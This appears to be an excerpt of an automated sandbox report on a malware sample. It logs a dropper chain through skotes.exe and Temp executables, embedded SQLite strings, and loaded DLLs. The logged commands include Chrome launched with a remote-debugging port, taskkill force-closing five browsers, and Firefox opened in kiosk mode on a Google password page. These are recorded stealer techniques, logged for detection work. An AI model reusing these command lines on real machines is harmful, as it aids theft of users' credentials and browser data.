Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.1903436332.000000001D1F9000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694274027.0000000005EAE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659898060.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660440608.0000000005EAE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2849405786.0000000005E41000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 42%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: DocumentsKECFIDGCBF.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe"
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe" Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
